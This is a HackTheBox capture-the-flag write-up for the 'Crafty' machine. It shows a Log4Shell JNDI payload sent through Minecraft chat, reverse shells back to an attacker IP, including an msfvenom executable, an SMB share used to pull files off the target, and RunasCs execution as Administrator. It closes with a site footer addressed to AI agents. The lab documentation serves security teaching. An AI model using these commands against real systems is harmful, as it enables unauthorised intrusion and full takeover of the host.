# Crafty {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Summary We discovered two open ports: 80 and, 25565. Port 80 is running a Microsoft IIS web server hosting a static site called Crafty, while port 25565 is a Minecraft server on version 1.16, which is vulnerable to the Log4Shell RCE vulnerability (CVE-2021-44228). We set up the Log4j-shell-poc exploit from GitHub, downloaded JDK 1.8.0\_20 to run the exploit, and used TLauncher to run Minecraft version 1.16.5 and connect to play.crafty.htb. By sending a crafted payload via the Minecraft chat, we gained a reverse shell as the user `svc_minecraft`. On the desktop of this user, we found the first flag and, upon further enumeration, discovered a plugin containing a cryptic string that turned out to be the `Administrator` password. Using this password, we executed a reverse shell as `Administrator`, retrieved the root flag, and achieved full system control. ## Recon We start with a Nmap scan and discover two open ports, 80 and 25565. With a subsequent service and default script scan, we see that port 80 is running a Microsoft IIS hosting a website called Crafty. We are dealing with a Windows machine. On 25565, we are dealing with a Minecraft server in version 1.16. This is a very old version; this may be one affected by the RCE vulnerability through Log4J.

The following Gobuster scan of the web server does not reveal any interesting directories.

The site is just static, but might reveal another vhost: play.crafty.htb. Through this, we might be able to connect to the Minecraft server.

We make use of the mcli tool. The mcli is a command-line application that provides a front end for the mctools library. mcli supports all operations offered by mctools in a simple, robust manner. With that, we check on the connection of the Minecraft server. Both vhost seem valid. {% embed url="" %}

After a short search for the version of 1.16.5, we are confronted with several POCs for RCE via Log4J on GitHub - `CVE-2021-44228` The Log4j RCE vulnerability, known as Log4Shell, allows attackers to execute arbitrary code on a server by exploiting a flaw in the Log4j library's logging mechanism, where specially crafted log messages can trigger malicious JNDI lookups. This severe flaw impacts many applications and services that use Log4j for logging, posing significant security risks. This is one of the many. So we might get a foothold with this. {% embed url="" %} ## Foothold We make use of the following exploit: {% embed url="" %} ### Exploit Setup We test it first. We also need an executable Minecraft client, but we'll take care of that after we get the exploit running. Furthermore, we see that JDK 1.8.0\_20 is missing. This is required by the exploit and must be downloaded separately.

There are many ways to do this; under the following link, there are possibilities to download them without Oracle access. {% embed url="" %} At the time of the release of the machine, the following path still worked, but unfortunately no longer at the time of the writeup. ``` wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz ``` We can either create an account with oracle - a ten-minute mail will suffice - and download the `jdk-8u20` on the official site... {% embed url="" %} ... or we use the following portal, introduced recently: {% embed url="" %} After placing the contents of the download JDK into `jdk1.8.0_20`...

... we are able to successfully launch the POC. `--lport` in this case, is the port we expect our connection from our reverse shell.

### Minecraft Setup Since we are dealing with a very old version and we do not have an official Minecraft account, let's make use of TLauncher. Using this Java launcher, we can download the version we need and run it locally without having an account. The versions might differ now. You might also need to start the launcher again after an update.

Select `1.16.5`, install the game, and then launch it.

Make a direct connection to `play.crafty.htb`. Don't forget to update your `/etc/hosts` file.

### Exploit Now you need to update the POC first. Since we are dealing with a Windows machine and not a Linux one, replace the content of the variable `cmd` `/bin/sh` with `cmd.exe`.

Now run the exploit again. ``` python poc.py --userip 10.10.14.67 --webport 8000 --lport 9001 ``` ``` --userip 10.10.14.67 #our machine ip ``` ``` --lport 9001 #our listining port ``` ``` --webport 8000 #web server ``` The exploit is asking us to send the following payload to trigger the exploit. To do so, we use the chat while in game. ``` ${jndi:ldap://10.10.14.67:1389/a} ```

But first, we run a listener on port 9001. Next, be in the game and press `t` to open chat. Then paste `${jndi:ldap://:1389/a}` and send the payload in the chat.

We receive a connection back as `svc_minecraft`. (The connection to the game time-outs)

On the desktop of the user, we find the first flag.

## Privilege Escalation We check the AV / Defender Protection. Everything is turned off. ``` c:\Users\svc_minecraft\Desktop>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\svc_minecraft\Desktop> Get-MpComputerStatus Get-MpComputerStatus AMEngineVersion : 0.0.0.0 AMProductVersion : 4.18.23100.2009 AMRunningMode : Not running AMServiceEnabled : False AMServiceVersion : 0.0.0.0 AntispywareEnabled : False AntispywareSignatureAge : 4294967295 AntispywareSignatureLastUpdated : AntispywareSignatureVersion : 0.0.0.0 AntivirusEnabled : False AntivirusSignatureAge : 4294967295 AntivirusSignatureLastUpdated : AntivirusSignatureVersion : 0.0.0.0 BehaviorMonitorEnabled : False ComputerID : CE4D07DA-73C9-9868-C9F9-28FB4997F62F ComputerState : 0 DefenderSignaturesOutOfDate : False DeviceControlDefaultEnforcement : N/A DeviceControlPoliciesLastUpdated : 12/31/1600 4:00:00 PM DeviceControlState : N/A FullScanAge : 4294967295 FullScanEndTime : FullScanOverdue : False FullScanRequired : False FullScanSignatureVersion : FullScanStartTime : IoavProtectionEnabled : False IsTamperProtected : False IsVirtualMachine : True LastFullScanSource : 0 LastQuickScanSource : 0 NISEnabled : False NISEngineVersion : 0.0.0.0 NISSignatureAge : 4294967295 NISSignatureLastUpdated : NISSignatureVersion : 0.0.0.0 OnAccessProtectionEnabled : False ProductStatus : 1 QuickScanAge : 4294967295 QuickScanEndTime : QuickScanOverdue : False QuickScanSignatureVersion : QuickScanStartTime : RealTimeProtectionEnabled : False RealTimeScanDirection : 0 RebootRequired : False SmartAppControlExpiration : SmartAppControlState : TamperProtectionSource : N/A TDTMode : N/A TDTSiloType : N/A TDTStatus : N/A TDTTelemetry : N/A TroubleShootingDailyMaxQuota : TroubleShootingDailyQuotaLeft : TroubleShootingEndTime : TroubleShootingExpirationLeft : TroubleShootingMode : TroubleShootingModeSource : TroubleShootingQuotaResetTime : TroubleShootingStartTime : PSComputerName : ``` While enumerating, we found a plugin.

To find out more, we need to bring this to our machine. Here we had the possibility to use powercat as shown in the following source, which is really interesting: {% embed url="" %} But this is no longer possible. Another way is to use an SMB server we can set up with impacket. Since the server does not trust SMB without a user and password, we simply set one. ``` impacket-smbserver smbFolder $(pwd) -smb2support -username test -password test123 ```

Next, we include the share and copy the plugin to it. ``` net use x: \\10.10.14.67\smbFolder /user:test test123 cp playercounter-1.0-SNAPSHOT.jar x:\ ```

To analyze the Jar, we use the Java Decompiler. {% embed url="" %}

Here we find a rather cryptic string, possibly a password. After we have tried the password for the user Administrator using runascs.exe to execute something on the system, we realize that this is his password.

We prepare a reverse shell exe using msfvenom (defender and co are deactivated). ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.67 LPORT=4445 -f exe > rev.exe ```

Next, we get the msfvenom reverse shell exe from our share, set up a listener on our desired port, and use `RunasCs.exe` to execute it as an administrator.

We get a connection as an administrator and find the root flag on his desktop.

A more boring way would have been to read the flag directly. ``` .\RunasCs.exe Administrator REDACTED "cmd /c dir C:\Users\Administrator\Desktop" .\RunasCs.exe Administrator REDACTED "cmd /c type C:\Users\Administrator\Desktop\root.txt" ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hackthebox/2024/crafty.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.